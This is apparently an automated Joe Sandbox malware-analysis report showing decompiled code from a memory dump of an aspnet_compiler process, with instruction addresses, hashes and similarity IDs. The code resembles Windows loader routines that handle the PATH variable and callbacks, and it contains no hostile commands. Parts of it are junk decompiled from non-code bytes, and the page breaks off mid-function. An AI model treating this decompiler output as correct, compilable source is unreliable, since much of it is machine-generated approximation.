				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t234;
				signed int _t238;
				intOrPtr* _t239;
				intOrPtr* _t240;
				signed int _t243;
				signed int _t245;
				intOrPtr _t247;
				signed int _t250;
				signed int _t257;
				signed int _t260;
				signed int _t268;
				intOrPtr _t274;
				signed int _t276;
				signed int _t278;
				void* _t279;
				signed int _t280;
				unsigned int _t283;
				signed int _t287;
				void* _t288;
				signed int _t289;
				signed int _t293;
				intOrPtr _t305;
				signed int _t314;
				signed int _t316;
				signed int _t317;
				signed int _t321;
				signed int _t322;
				void* _t324;
				signed int _t325;
				signed int _t327;
				signed int _t330;
				intOrPtr* _t331;
				intOrPtr* _t333;

				_t327 = _t330;
				_t331 = _t330 - 0x4c;
				_v8 =  *0x11cd360 ^ _t327;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t321 = 0x11cb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t283 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t274 = 0x48;
				_t303 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t314 = 0;
				_v37 = _t303;
				if(_v48 <= 0) {
					L16:
					_t45 = _t274 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t322 = 0xc0000106;
						goto L32;
					} else {
						_t321 = L010F4620(_t283,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
						_v52 = _t321;
						__eflags = _t321;
						if(_t321 == 0) {
							_t322 = 0xc0000017;
							goto L32;
						} else {
							 *(_t321 + 0x44) =  *(_t321 + 0x44) & 0x00000000;
							_t50 = _t321 + 0x48; // 0x48
							_t316 = _t50;
							_t303 = _v32;
							 *((intOrPtr*)(_t321 + 0x3c)) = _t274;
							_t276 = 0;
							 *((short*)(_t321 + 0x30)) = _v48;
							__eflags = _t303;
							if(_t303 != 0) {
								 *(_t321 + 0x18) = _t316;
								__eflags = _t303 - 0x11c8478;
								 *_t321 = ((0 | _t303 == 0x011c8478) - 0x00000001 & 0xfffffffb) + 7;
								E0111F3E0(_t316,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
								_t303 = _v32;
								_t331 = _t331 + 0xc;
								_t276 = 1;
								__eflags = _a8;
								_t316 = _t316 + (( *_t303 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t268 = E011639F2(_t316);
									_t303 = _v32;
									_t316 = _t268;
								}
							}
							_t287 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t322 = _v68;
								__eflags = 0;
								 *((short*)(_t316 - 2)) = 0;
								goto L32;
							} else {
								_t278 = _t321 + _t276 * 4;
								_v56 = _t278;
								do {
									__eflags = _t303;
									if(_t303 != 0) {
										_t234 =  *(_v60 + _t287 * 4);
										__eflags = _t234;
										if(_t234 == 0) {
											goto L30;
										} else {
											__eflags = _t234 == 5;
											if(_t234 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t278 =  *(_v60 + _t287 * 4);
										 *(_t278 + 0x18) = _t316;
										_t238 =  *(_v60 + _t287 * 4);
										__eflags = _t238 - 8;
										if(_t238 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t238 * 4 +  &M01102959))) {
												case 0:
													__ax =  *0x11c8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0111F3E0(__edi,  *0x11c848c, __ax & 0x0000ffff);
														__eax =  *0x11c8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0111F3E0(_t316, _v80, _v64);
													_t263 = _v64;
													goto L26;
												case 2:
													 *0x11c8480 & 0x0000ffff = E0111F3E0(__edi,  *0x11c8484,  *0x11c8480 & 0x0000ffff);
													__eax =  *0x11c8480 & 0x0000ffff;
													__eax = ( *0x11c8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0111F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0111F3E0(_t316, _v76, _v36);
														_t263 = _v36;
													}
													L26:
													_t331 = _t331 + 0xc;
													_t316 = _t316 + (_t263 >> 1) * 2 + 2;
													__eflags = _t316;
													L27:
													_push(0x3b);
													_pop(_t265);
													 *((short*)(_t316 - 2)) = _t265;
													goto L28;
												case 6:
													__ebx =  *0x11c575c;
													__eflags = __ebx - 0x11c575c;
													if(__ebx != 0x11c575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0111F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x11c575c;
														} while (__ebx != 0x11c575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x11c8478 & 0x0000ffff = E0111F3E0(__edi,  *0x11c847c,  *0x11c8478 & 0x0000ffff);
													__eax =  *0x11c8478 & 0x0000ffff;
													__eax = ( *0x11c8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E011639F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x11c6e58 & 0x0000ffff = E0111F3E0(__edi,  *0x11c6e5c,  *0x11c6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x11c6e58 & 0x0000ffff;
													__eax = ( *0x11c6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t287 = _v16;
													_t303 = _v32;
													L29:
													_t278 = _t278 + 4;
													__eflags = _t278;
													_v56 = _t278;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t287 = _t287 + 1;
									_v16 = _t287;
									__eflags = _t287 - _v48;
								} while (_t287 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t238 =  *(_v60 + _t314 * 4);
						if(_t238 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t238 * 4 +  &M01102935))) {
							case 0:
								__ax =  *0x11c8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t303 =  &_v64;
								_v80 = E01102E3E(0,  &_v64);
								_t274 = _t274 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x11c8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x11c8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E010EEEF0(0x11c79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E010EEB70(__ecx, 0x11c79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t212 = _v72;
											__eflags = _t212;
											if(_t212 != 0) {
												L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
											}
											_t213 = _v52;
											__eflags = _t213;
											if(_t213 != 0) {
												__eflags = _t322;
												if(_t322 < 0) {
													L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
													_t213 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t283 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x11c7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L010F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E010EEB70(__ecx, 0x11c79a0);
										__eax = _v52;
										L36:
										_pop(_t315);
										_pop(_t323);
										__eflags = _v8 ^ _t327;
										_pop(_t275);
										return E0111B640(_t213, _t275, _v8 ^ _t327, _t303, _t315, _t323);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t270 = _v56;
								if(_v56 != 0) {
									_t303 =  &_v36;
									_t272 = E01102E3E(_t270,  &_v36);
									_t283 = _v36;
									_v76 = _t272;
								}
								if(_t283 == 0) {
									goto L44;
								} else {
									_t274 = _t274 + 2 + _t283;
								}
								goto L14;
							case 6:
								__eax =  *0x11c5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x11c8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x11c8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x11c6e58 & 0x0000ffff;
								__eax = ( *0x11c6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t314 = _t314 + 1;
								if(_t314 >= _v48) {
									goto L16;
								} else {
									_t303 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t288 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("adc [ecx], al");
					asm("o16 sub [eax], dl");
					_t239 = _t238 + _t331;
					asm("daa");
					asm("adc [ecx], al");
					asm("adc [es:ecx], al");
					_t324 = _t321 + 1;
					 *_t239 =  *_t239 - _t303;
					 *0x1f011026 =  *0x1f011026 + _t239;
					_pop(_t279);
					asm("adc al, 0x1");
					_t240 = _t331;
					_t333 = _t239;
					 *_t240 =  *_t240 - _t303;
					 *0x201145b =  *0x201145b + _t324;
					 *_t240 =  *_t240 - _t303;
					 *((intOrPtr*)(_t240 - 0x9feefd8)) =  *((intOrPtr*)(_t240 - 0x9feefd8)) + _t240;
					asm("daa");
					asm("adc [ecx], al");
					_push(ds);
					 *_t240 =  *_t240 - _t303;
					 *((intOrPtr*)(_t324 + 0x28)) =  *((intOrPtr*)(_t324 + 0x28)) + _t288;
					asm("adc [ecx], al");
					asm("daa");
					asm("adc [ecx], al");
					asm("fcomp dword [ebx+0x14]");
					 *((intOrPtr*)(_t240 +  &_a1546912012)) =  *((intOrPtr*)(_t240 +  &_a1546912012)) + _t324;
					asm("adc al, 0x1");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x11aff00);
					E0112D08C(_t279, _t316, _t324);
					_v44 =  *[fs:0x18];
					_t317 = 0;
					 *_a24 = 0;
					_t280 = _a12;
					__eflags = _t280;
					if(_t280 == 0) {
						_t243 = 0xc0000100;
					} else {
						_v8 = 0;
						_t325 = 0xc0000100;
						_v52 = 0xc0000100;
						_t245 = 4;
						while(1) {
							_v40 = _t245;
							__eflags = _t245;
							if(_t245 == 0) {
								break;
							}
							_t293 = _t245 * 0xc;
							_v48 = _t293;
							__eflags = _t280 -  *((intOrPtr*)(_t293 + 0x10b1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t260 = E0111E5C0(_a8,  *((intOrPtr*)(_t293 + 0x10b1668)), _t280);
									_t333 = _t333 + 0xc;
									__eflags = _t260;
									if(__eflags == 0) {
										_t325 = E011551BE(_t280,  *((intOrPtr*)(_v48 + 0x10b166c)), _a16, _t317, _t325, __eflags, _a20, _a24);
										_v52 = _t325;
										break;
									} else {
										_t245 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t245 = _t245 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t325;
						__eflags = _t325;
						if(_t325 < 0) {
							__eflags = _t325 - 0xc0000100;
							if(_t325 == 0xc0000100) {
								_t289 = _a4;
								__eflags = _t289;
								if(_t289 != 0) {
									_v36 = _t289;
									__eflags =  *_t289 - _t317;
									if( *_t289 == _t317) {
										_t325 = 0xc0000100;
										goto L76;
									} else {
										_t305 =  *((intOrPtr*)(_v44 + 0x30));
										_t247 =  *((intOrPtr*)(_t305 + 0x10));
										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t289;
										if( *((intOrPtr*)(_t247 + 0x48)) == _t289) {
											__eflags =  *(_t305 + 0x1c);
											if( *(_t305 + 0x1c) == 0) {
												L106:
												_t325 = E01102AE4( &_v36, _a8, _t280, _a16, _a20, _a24);
												_v32 = _t325;
												__eflags = _t325 - 0xc0000100;
												if(_t325 != 0xc0000100) {
													goto L69;
												} else {
													_t317 = 1;
													_t289 = _v36;
													goto L75;
												}
											} else {
												_t250 = E010E6600( *(_t305 + 0x1c));
												__eflags = _t250;
												if(_t250 != 0) {
													goto L106;
												} else {
													_t289 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t325 = E01102C50(_t289, _a8, _t280, _a16, _a20, _a24, _t317);
											L76:
											_v32 = _t325;
											goto L69;
										}
									}
									goto L108;
								} else {
									E010EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t325 = _a24;
									_t257 = E01102AE4( &_v36, _a8, _t280, _a16, _a20, _t325);
									_v32 = _t257;
									__eflags = _t257 - 0xc0000100;
									if(_t257 == 0xc0000100) {
										_v32 = E01102C50(_v36, _a8, _t280, _a16, _a20, _t325, 1);
									}
									_v8 = _t317;
									E01102ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t243 = _t325;
					}
					L70:
					return E0112D0D1(_t243);
				}
				L108:
			}

0x01102584
0x01102586
0x01102590
0x01102596
0x01102597
0x01102598
0x01102599
0x0110259e
0x011025a4
0x011025a9
0x011025ac
0x011025ae
0x011025b1
0x011025b2
0x011025b5
0x011025b8
0x011025bb
0x011025bc
0x011025bf
0x011025c2
0x011025c5
0x011025c6
0x011025cb
0x011025ce
0x011025d8
0x011025dd
0x011025de
0x011025e1
0x011025e3
0x011025e9
0x011026da
0x011026da
0x011026dd
0x011026e2
0x01145b56
0x00000000
0x011026e8
0x011026f9
0x011026fb
0x011026fe
0x01102700
0x01145b60
0x00000000
0x01102706
0x01102706
0x0110270a
0x0110270a
0x0110270d
0x01102713
0x01102716
0x01102718
0x0110271c
0x0110271e
0x01145b6c
0x01145b6f
0x01145b7f
0x01145b89
0x01145b8e
0x01145b93
0x01145b96
0x01145b9c
0x01145ba0
0x01145ba3
0x01145bab
0x01145bb0
0x01145bb3
0x01145bb3
0x01145ba3
0x01102724
0x01102726
0x01102729
0x0110272c
0x0110279d
0x0110279d
0x011027a0
0x011027a2
0x00000000
0x0110272e
0x0110272e
0x01102731
0x01102734
0x01102734
0x01102736
0x01145bc1
0x01145bc1
0x01145bc4
0x00000000
0x01145bca
0x01145bca
0x01145bcd
0x00000000
0x01145bd3
0x00000000
0x01145bd3
0x01145bcd
0x0110273c
0x0110273c
0x01102742
0x01102747
0x0110274a
0x0110274d
0x01102750
0x00000000
0x01102756
0x01102756
0x00000000
0x01102902
0x01102908
0x0110290b
0x00000000
0x01102911
0x0110291c
0x01102921
0x00000000
0x01102921
0x00000000
0x00000000
0x01102880
0x01102887
0x0110288c
0x00000000
0x00000000
0x01102805
0x0110280a
0x01102814
0x01102816
0x00000000
0x00000000
0x0110281e
0x01102821
0x01102823
0x00000000
0x01102829
0x01102829
0x01102831
0x0110283c
0x0110283e
0x00000000
0x0110283e
0x00000000
0x00000000
0x0110284e
0x01102850
0x01102851
0x01102854
0x01102857
0x0110285a
0x0110285c
0x0110285d
0x00000000
0x00000000
0x0110275d
0x01102761
0x00000000
0x01102767
0x0110276e
0x01102773
0x01102773
0x01102776
0x01102778
0x0110277e
0x0110277e
0x01102781
0x01102781
0x01102783
0x01102784
0x00000000
0x00000000
0x01145bd8
0x01145bde
0x01145be4
0x01145be6
0x01145be8
0x01145be9
0x01145bee
0x01145bf8
0x01145bff
0x01145c01
0x01145c04
0x01145c07
0x01145c0b
0x01145c0d
0x01145c0d
0x01145c15
0x01145c18
0x01145c1b
0x01145c1b
0x01145c1e
0x00000000
0x00000000
0x011028c3
0x011028c8
0x011028d2
0x011028d4
0x011028d8
0x011028db
0x01145c26
0x01145c28
0x01145c2d
0x01145c2d
0x00000000
0x00000000
0x01145c34
0x01145c36
0x01145c49
0x01145c4e
0x01145c54
0x01145c5b
0x01145c5d
0x01145c60
0x01102788
0x01102788
0x0110278b
0x0110278e
0x0110278e
0x0110278e
0x01102791
0x00000000
0x00000000
0x01102756
0x01102750
0x00000000
0x01102794
0x01102794
0x01102795
0x01102798
0x01102798
0x00000000
0x01102734
0x0110272c
0x01102700
0x011025ef
0x011025ef
0x011025ef
0x011025f2
0x011025f8
0x00000000
0x00000000
0x011025fe
0x00000000
0x011028e6
0x011028ec
0x011028ef
0x011028f5
0x011028f8
0x011028f8
0x00000000
0x011028f8
0x00000000
0x00000000
0x01102866
0x01102866
0x01102876
0x01102879
0x00000000
0x00000000
0x011027e0
0x011027e7
0x011027e9
0x011027eb
0x01145afd
0x00000000
0x01145afd
0x00000000
0x00000000
0x01102633
0x01102638
0x0110263b
0x0110263c
0x0110263e
0x01102640
0x01102642
0x01102647
0x01102649
0x0110264e
0x01102650
0x01102653
0x01102659
0x011026a2
0x011026a7
0x011026ac
0x011026b2
0x01145b11
0x01145b15
0x01145b17
0x00000000
0x011026b8
0x011026b8
0x011026ba
0x011027a6
0x011027a6
0x011027a9
0x011027ab
0x011027b9
0x011027b9
0x011027be
0x011027c1
0x011027c3
0x011027c5
0x011027c7
0x01145c74
0x01145c79
0x01145c79
0x011027c7
0x00000000
0x011026c0
0x011026c0
0x011026c3
0x011026c6
0x011026c6
0x011026c9
0x011026c9
0x00000000
0x011026c9
0x011026ba
0x0110265b
0x0110265b
0x0110265e
0x01102667
0x0110266d
0x01102677
0x0110267c
0x0110267f
0x01102681
0x01145b49
0x01145b4e
0x011027cd
0x011027d0
0x011027d1
0x011027d2
0x011027d4
0x011027dd
0x01102687
0x01102687
0x0110268a
0x0110268b
0x0110268e
0x0110268f
0x01102691
0x01102696
0x01102698
0x0110269d
0x0110269f
0x00000000
0x0110269f
0x01102681
0x00000000
0x00000000
0x01102846
0x00000000
0x00000000
0x01102605
0x0110260a
0x0110260c
0x01102611
0x01102616
0x01102619
0x01102619
0x0110261e
0x00000000
0x01102624
0x01102627
0x01102627
0x00000000
0x00000000
0x01145b1f
0x00000000
0x00000000
0x01102894
0x0110289b
0x0110289d
0x011028a1
0x01145b2b
0x01145b2e
0x01145b2e
0x011028a7
0x011028a9
0x01145b04
0x01145b09
0x01145b09
0x01145b09
0x00000000
0x00000000
0x01145b35
0x01145b3c
0x011028fb
0x011028fb
0x011026cc
0x011026cc
0x011026d0
0x00000000
0x011026d2
0x011026d2
0x00000000
0x011026d2
0x00000000
0x00000000
0x011025fe
0x0110292d
0x0110292f
0x01102930
0x01102935
0x01102937
0x01102939
0x0110293c
0x0110293e
0x0110293f
0x01102941
0x01102945
0x01102946
0x01102948
0x0110294e
0x0110294f
0x01102951
0x01102951
0x01102952
0x01102954
0x0110295a
0x0110295c
0x01102962
0x01102963
0x01102965
0x01102966
0x01102968
0x0110296b
0x0110296e
0x0110296f
0x01102971
0x01102974
0x0110297b
0x0110297d
0x0110297e
0x0110297f
0x01102980
0x01102981
0x01102982
0x01102983
0x01102984
0x01102985
0x01102986
0x01102987
0x01102988
0x01102989
0x0110298a
0x0110298b
0x0110298c
0x0110298d
0x0110298e
0x0110298f
0x01102990
0x01102992
0x01102997
0x011029a3
0x011029a6
0x011029ab
0x011029ad
0x011029b0
0x011029b2
0x01145c80
0x011029b8
0x011029b8
0x011029bb
0x011029c0
0x011029c5
0x011029c6
0x011029c6
0x011029c9
0x011029cb
0x00000000
0x00000000
0x011029cd
0x011029d0
0x011029d9
0x011029db
0x011029dd
0x01102a7f
0x01102a84
0x01102a87
0x01102a89
0x01145ca1
0x01145ca3
0x00000000
0x01102a8f
0x01102a8f
0x00000000
0x01102a8f
0x00000000
0x011029e3
0x011029e3
0x011029e3
0x00000000
0x011029e3
0x011029dd
0x00000000
0x011029db
0x011029e6
0x011029e9
0x011029eb
0x011029ed
0x011029f3
0x011029f5
0x011029f8
0x011029fa
0x01102a97
0x01102a9a
0x01102a9d
0x01102add
0x00000000
0x01102a9f
0x01102aa2
0x01102aa5
0x01102aa8
0x01102aab
0x01145cab
0x01145caf
0x01145cc5
0x01145cda
0x01145cdc
0x01145cdf
0x01145ce5
0x00000000
0x01145ceb
0x01145ced
0x01145cee
0x00000000
0x01145cee
0x01145cb1
0x01145cb4
0x01145cb9
0x01145cbb
0x00000000
0x01145cbd
0x01145cbd
0x00000000
0x01145cbd
0x01145cbb
0x01102ab1
0x01102ab1
0x01102ac4
0x01102ac6
0x01102ac6
0x00000000
0x01102ac6
0x01102aab
0x00000000
0x01102a00
0x01102a09
0x01102a0e
0x01102a21
0x01102a24
0x01102a35
0x01102a3a
0x01102a3d
0x01102a42
0x01102a59
0x01102a59
0x01102a5c
0x01102a5f
0x01102a5f
0x011029fa
0x011029f3
0x01102a64
0x01102a64
0x01102a6b
0x01102a6b
0x01102a6d
0x01102a72
0x01102a72
0x00000000

Strings

PATH, xrefs: 01102642, 01102691

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 7066ccbdd2051e269812ab08392e87cbc6d5d51c02888a8c3b8d9c94cfed6959
Instruction ID: d07ced233216285635c3f2677cfa9e1419954a6cd141d3cd36517f8acd68232b
Opcode Fuzzy Hash: 7066ccbdd2051e269812ab08392e87cbc6d5d51c02888a8c3b8d9c94cfed6959
Instruction Fuzzy Hash: ACC1BF71E106199FCB2EDF98D885BEDBBB1FF58700F154029E901AB290E7B4A941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 010DC962 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E010DC962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x11cd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E010EEEF0(0x11c70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0115F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E010EEB70(_t29, 0x11c70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0111B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0115F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x11c70c0; // 0x0
					while(_t38 != 0x11c70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x11cb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x010dc96a
0x010dc974
0x010dc988
0x010dc98a
0x01147c9d
0x01147c9f
0x01147ca4
0x01147cae
0x01147cf0
0x01147cf5
0x01147cfa
0x010dc992
0x010dc996
0x010dc997
0x010dc998
0x010dc9a3
0x010dc9a3
0x01147cb0
0x01147cb7
0x01147cbb
0x00000000
0x00000000
0x01147cbd
0x01147ce8
0x01147cc5
0x01147cc8
0x01147cca
0x01147cd0
0x01147cd6
0x01147cde
0x01147ce4
0x01147ce4
0x01147cd0
0x00000000
0x01147ce8
0x010dc990
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af9c68a2579728ac37f6bcbcc4ff5088fec24cf757836de1869f62463884d630
Instruction ID: 6be449c13689fd3562ca57f3bec7030b28936628162da8305986152b45a3889c
Opcode Fuzzy Hash: af9c68a2579728ac37f6bcbcc4ff5088fec24cf757836de1869f62463884d630
Instruction Fuzzy Hash: A211E5313007079FC719AF2DDC85A6BBBE5BB95A14B00053DE951936D1DB60EC50CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 0110FAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0110FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E010EEEF0(0x11c7b60);
					_t134 =  *0x11c7b84; // 0x77e47b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x11c7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x11c7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
